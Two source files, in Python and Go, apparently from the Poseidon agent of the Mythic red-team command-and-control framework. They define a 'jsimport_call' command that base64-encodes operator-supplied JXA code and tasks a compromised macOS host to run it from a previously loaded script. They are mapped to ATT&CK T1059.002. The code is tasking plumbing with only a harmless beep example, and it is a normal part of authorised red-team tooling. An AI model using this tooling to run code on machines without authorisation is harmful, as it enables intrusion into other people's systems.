File: Payload_Type/poseidon/mythic/agent_functions/jsimport_call.py
from mythic_payloadtype_container.MythicCommandBase import *
from mythic_payloadtype_container.MythicRPC import *
import base64


class JsImportCallArguments(TaskArguments):
    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="code",
                type=ParameterType.String,
                description="JXA Code to execute from script loaded with jsimport.",
                parameter_group_info=[
                    ParameterGroupInfo(
                        group_name="Default",
                        ui_position=2
                    ),
                ]
            ),
            CommandParameter(
                name="filename",
                display_name="File Registered via 'jsimport' with the function to execute",
                type=ParameterType.ChooseOne,
                dynamic_query_function=self.get_files,
                parameter_group_info=[
                    ParameterGroupInfo(
                        ui_position=1
                    )
                ]
            ),
        ]

    async def get_files(self, callback: dict) -> [str]:
        file_resp = await MythicRPC().execute("get_file", callback_id=callback["id"],
                                              limit_by_callback=True,
                                              get_contents=False,
                                              filename="",
                                              max_results=-1)
        if file_resp.status == MythicRPCStatus.Success:
            file_names = []
            for f in file_resp.response:
                # await MythicRPC().execute("get_file_contents", agent_file_id=f["agent_file_id"])
                if f["filename"] not in file_names:
                    file_names.append(f["filename"])
            return file_names
        else:
            await MythicRPC().execute("create_event_message", warning=True,
                                      message=f"Failed to get files: {file_resp.error}")
            return []

    async def parse_arguments(self):
        if len(self.command_line) == 0:
            raise Exception("Must provide arguments")
        else:
            try:
                self.load_args_from_json_string(self.command_line)
                self.add_arg(
                    "code", base64.b64encode(self.get_arg("code").encode()).decode()
                )
            except:
                self.add_arg("code", base64.b64encode(self.command_line.encode()).decode())

    async def parse_dictionary(self, dictionary):
        if "code" in dictionary and dictionary["code"] is not None:
            self.add_arg("code", base64.b64encode(dictionary["code"].encode()).decode())
        if "filename" in dictionary and dictionary["filename"] is not None:
            self.add_arg("filename", dictionary["filename"])


class JsImportCallCommand(CommandBase):
    cmd = "jsimport_call"
    needs_admin = False
    help_cmd = 'jsimport_call {  "code": "ObjC.import(\'Cocoa\'); $.NSBeep();" }'
    description = "Execute jxa code from a loaded script via jsimport."
    version = 1
    author = "@its_a_feature_"
    argument_class = JsImportCallArguments
    attackmapping = ["T1059.002"]
    attributes = CommandAttributes(
        # eventually uncomment this once poseidon supports dynamic compilation of commands
        supported_os=[SupportedOS.MacOS]
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        file_resp = await MythicRPC().execute("get_file", task_id=task.id,
                                              filename=task.args.get_arg("filename"),
                                              limit_by_callback=True,
                                              get_contents=False)
        if file_resp.status == MythicRPCStatus.Success:
            if len(file_resp.response) > 0:
                task.args.add_arg("file_id", file_resp.response[0]["agent_file_id"])
                task.display_params = "code within " + task.args.get_arg("filename")
                task.args.remove_arg("filename")
            elif len(file_resp.response) == 0:
                raise Exception("Failed to find the named file. Have you uploaded it before? Did it get deleted?")
        else:
            raise Exception("Error from Mythic trying to search files:\n" + str(file_resp.error))
        return task

    async def process_response(self, response: AgentResponse):
        pass

File: Payload_Type/poseidon/poseidon/agentfunctions/jsimport_call.go
package agentfunctions

import (
	"encoding/base64"
	"fmt"
	agentstructs "github.com/MythicMeta/MythicContainer/agent_structs"
	"github.com/MythicMeta/MythicContainer/logging"
	"github.com/MythicMeta/MythicContainer/mythicrpc"
	"github.com/MythicMeta/MythicContainer/utils/helpers"
)

func init() {
	agentstructs.AllPayloadData.Get("poseidon").AddCommand(agentstructs.Command{
		Name:                "jsimport_call",
		HelpString:          "jsimport_call {  \"code\": \"ObjC.import(\\'Cocoa\\'); $.NSBeep();\" }",
		Description:         "Execute jxa code from a loaded script via jsimport.",
		Version:             1,
		MitreAttackMappings: []string{"T1059.002"},
		Author:              "@its_a_feature_",
		CommandParameters: []agentstructs.CommandParameter{
			{
				Name:             "code",
				ModalDisplayName: "JXA Code to execute from script loaded with jsimport",
				ParameterType:    agentstructs.COMMAND_PARAMETER_TYPE_STRING,
				Description:      "Select the JXA Script to load into memory",
				ParameterGroupInformation: []agentstructs.ParameterGroupInfo{
					{
						ParameterIsRequired: true,
						UIModalPosition:     2,
					},
				},
			},
			{
				Name:                 "filename",
				ModalDisplayName:     "File Registered via 'jsimport' with the function to execute",
				ParameterType:        agentstructs.COMMAND_PARAMETER_TYPE_CHOOSE_ONE,
				Description:          "The name of the script",
				DynamicQueryFunction: getCallbackFiles,
				ParameterGroupInformation: []agentstructs.ParameterGroupInfo{
					{
						ParameterIsRequired: true,
						UIModalPosition:     1,
					},
				},
			},
		},
		CommandAttributes: agentstructs.CommandAttribute{
			SupportedOS: []string{agentstructs.SUPPORTED_OS_MACOS},
		},
		TaskFunctionParseArgString: func(args *agentstructs.PTTaskMessageArgsData, input string) error {
			return args.LoadArgsFromJSONString(input)
		},
		TaskFunctionParseArgDictionary: func(args *agentstructs.PTTaskMessageArgsData, input map[string]interface{}) error {
			return args.LoadArgsFromDictionary(input)
		},
		TaskFunctionCreateTasking: func(taskData *agentstructs.PTTaskMessageAllData) agentstructs.PTTaskCreateTaskingMessageResponse {
			response := agentstructs.PTTaskCreateTaskingMessageResponse{
				Success: true,
				TaskID:  taskData.Task.ID,
			}
			if filename, err := taskData.Args.GetStringArg("filename"); err != nil {
				logging.LogError(err, "Failed to get filename")
				response.Success = false
				response.Error = err.Error()
				return response
			} else if search, err := mythicrpc.SendMythicRPCFileSearch(mythicrpc.MythicRPCFileSearchMessage{
				Filename:        filename,
				LimitByCallback: true,
				CallbackID:      taskData.Callback.ID,
				MaxResults:      1,
			}); err != nil {
				response.Success = false
				response.Error = "Error trying to search for files: " + err.Error()
				return response
			} else if !search.Success {
				response.Success = false
				response.Error = search.Error
				return response
			} else if len(search.Files) == 0 {
				response.Success = false
				response.Error = "Failed to find specified file"
				return response
			} else if code, err := taskData.Args.GetStringArg("code"); err != nil {
				response.Success = false
				response.Error = "Failed to find code parameter"
				return response
			} else {
				taskData.Args.RemoveArg("filename")
				taskData.Args.AddArg(agentstructs.CommandParameter{
					Name:          "file_id",
					ParameterType: agentstructs.COMMAND_PARAMETER_TYPE_STRING,
					DefaultValue:  search.Files[0].AgentFileId,
				})
				base64Code := base64.StdEncoding.EncodeToString([]byte(code))
				taskData.Args.SetArgValue("code", base64Code)
				displayString := fmt.Sprintf("code within %s ",
					search.Files[0].Filename)
				response.DisplayParams = &displayString
				return response
			}
		},
	})
}

func getCallbackFiles(input agentstructs.PTRPCDynamicQueryFunctionMessage) []string {
	if fileResp, err := mythicrpc.SendMythicRPCFileSearch(mythicrpc.MythicRPCFileSearchMessage{
		LimitByCallback:     true,
		CallbackID:          input.Callback,
		IsPayload:           false,
		IsDownloadFromAgent: false,
		Filename:            "",
	}); err != nil {
		logging.LogError(err, "Failed to search for files in callback")
		return []string{}
	} else if !fileResp.Success {
		logging.LogError(err, "Failed to search for files in callback", "mythic error", fileResp.Error)
		return []string{}
	} else {
		potentialFiles := []string{}
		for _, file := range fileResp.Files {
			if !helpers.StringSliceContains(potentialFiles, file.Filename) {
				potentialFiles = append(potentialFiles, file.Filename)
			}
		}
		return potentialFiles
	}
}
